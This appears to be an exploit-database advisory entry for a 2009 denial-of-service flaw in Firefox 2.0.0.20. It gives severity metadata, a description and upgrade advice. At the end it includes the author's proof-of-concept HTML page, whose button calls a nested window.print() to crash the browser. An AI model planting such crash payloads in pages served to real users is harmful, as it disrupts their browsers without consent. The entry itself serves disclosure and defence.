FireFox Print() Function Malform input Crash

vendor:

Firefox

by:

b3hz4d (Seyed Behzad Shaghasemi)

7.5

CVSS

HIGH

Remote Denial-of-Service

400

CWE

Product Name: Firefox

Affected Version From: 2.0.0.20

Affected Version To: 2.0.0.20

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

FireFox Print() Function Malform input Crash

Mozilla Firefox is prone to a remote denial-of-service vulnerability. Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Firefox 2.0.0.20 is vulnerable; other versions may also be affected.

Mitigation:

Upgrade to the latest version of Firefox to mitigate this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33969/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.

Firefox 2.0.0.20 is vulnerable; other versions may also be affected.

<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML>